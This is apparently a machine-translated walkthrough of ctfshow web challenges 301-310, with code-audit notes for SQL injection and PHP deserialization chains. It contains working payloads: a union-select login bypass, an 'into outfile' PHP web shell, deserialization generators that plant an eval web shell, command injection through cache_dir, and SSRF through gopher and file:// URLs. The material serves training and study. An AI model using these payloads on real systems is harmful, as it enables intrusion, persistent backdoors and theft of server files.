当前位置:网站首页>Getting started with ctfshow web (code audit)

Getting started with ctfshow web (code audit)

2022-07-21 18:32:00 Ff. cheng

301

Download the source code and see yes username No protection , There is sql Inject , And know the table name and column name 

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";
$result=$mysqli->query($sql);
$row=$result->fetch_array(MYSQLI_BOTH);
if($result->num_rows<1){
    
	$_SESSION['error']="1";
	header("location:login.php");
	return;
}
if(!strcasecmp($userpwd,$row['sds_password'])){
    
	$_SESSION['login']=1;
	$result->free();
	$mysqli->close();
	header("location:index.php");
	return;
}

Sqlmap Run :


Let the found content and post The passwords transmitted are equal :
The user enters a user name , Go to the database to check the corresponding password , Then compare with the password entered by the user

Then we union select Of 1( It can be imagined as a corresponding sds_password) The password passed to us 1 comparison , return true,union Inject :

' union select 1#
1

You can also try to write a sentence

'union select “<?php eval($_POST[shell]);?>” into outfile “/var/www/html/shell.php”%23

302

Where to modify :

if(!strcasecmp(sds_decode($userpwd),$row[‘sds_password’]

<?php
function sds_decode($str){
    
	return md5(md5($str.md5(base64_encode("sds")))."sds");
}
?>

It is to change the password entered by the user decode Method

Payload:

<?php

$str="1";
$a=md5(md5($str.md5(base64_encode("sds")))."sds");
echo $a;

?>

’ union select ‘d9c77c4e454869d5d8da3b4be79694d3’%23&userpwd=1

303-304

admin,admin Sign in


Close the first single quotation mark , forge address For injection 

1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#


305

See for each parameter waf


waf:


Sql No way

Class.php There is a danger function :


Deserialization exists :


In a word, deserialize and encode :


Ant sword connection database :


306

admin
admin1

notice class.php Medium log Class close Methods have dangerous functions


Find out dao.php Of destruct call class.php And call close Method :

It needs to be _construct in , Give Way log initialization , Then in this way, we can _destruct Call in log Of close Method


stay index.php Call in dao.php And there is deserialization , So in index.php Trigger deserialization

index.php – dao.php – class.php – close()

Payload:

<?php
class log{
    
	public $title='cys.php';
	public $info='<?php eval($_POST[shell]);?>';
}
class dao{
    	
	private $conn;
	public function __construct(){
    
		$this->conn=new log();
	}
}
echo base64_encode(serialize(new dao()));
?>

307

dao.php:

service.php


Can be called dao.php Medium clearCache Method

Touch it up :

logout.php Calling method


Config.php

Cache_dir controllable :


cache_dir Customizable dao Class clearCache Method parameters ,logout.php Call again dao class perform shell_exec

payload:

<?php
class config{
    
	public $cache_dir = ';echo `cat /var/www/html/f*` > flag.txt;';  // You can also write horse 
}

class dao{
    
	private $config;
	public function __construct(){
    
		$this->config=new config();
	}
}
echo base64_encode(serialize(new dao()));
?>


Access address :
URL/controller/flag.txt

308

Filtering can only be letters :

Wp Said in fun.php Find out ssrf Utilization point :


dao.php call


index.php Calling method


config.php

Similar to the above question

index.php -> config.php -> dao.php

<?php
class config{
    
	public $update_url = 'gopher://127.0.0.1:3306/……';
}
class dao{
    
	private $config;
	public function __construct(){
    
		$this->config=new config();
	}

}
$a=new dao();
echo base64_encode(serialize($a));
?>

The specific value is determined by gopherus Generate
Download address https://github.com/tarunkant/Gopherus

3306 Port is mysql Default port

doubt : Unwanted mysql password ? It could be empty


309

Need to take shell,308 My method doesn't work ,mysql There's a password

since mysql If you have a password, you can't type , Thinking about it, there is basically nothing left redis and fastcgi 了 , take dict Probe , It doesn't seem that redis, So the big probability is fastcgi, But how to determine the existence fastcgi I'm crazy, too .

Took a look at Master Yu's way , take gopher The delay of the agreement :

First write it down , etc. ssrf Then understand


Payload ditto

310

nginx Can pass fastcgi docking php, therefore nginx There will also be important information in the configuration file of , In addition, there are port forwarding and so on , There may be some important information in the configuration file ,

Master Yu :

9000 and 6379 It's all closed . Then we can try Read the configuration file 

<?php
class config{
    
	public $update_url = 'file:///etc/nginx/nginx.conf';
}
class dao{
    
	private $config;
	public function __construct(){
    
		$this->config=new config();
	}

}
$a=new dao();
echo base64_encode(serialize($a));
?>

obtain :

	server {
    
        listen       4476;
        server_name  localhost;
        root         /var/flag;
        index index.html;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}

visit 4476:

<?php
class config{
    
	public $update_url = 'http://127.0.0.1:4476';
}
class dao{
    
	private $config;
	public function __construct(){
    
		$this->config=new config();
	}
}
$a=new dao();
echo base64_encode(serialize($a));
?>
原网站

版权声明
本文为[Ff. cheng]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/202/202207210142035925.html

边栏推荐

猜你喜欢

随机推荐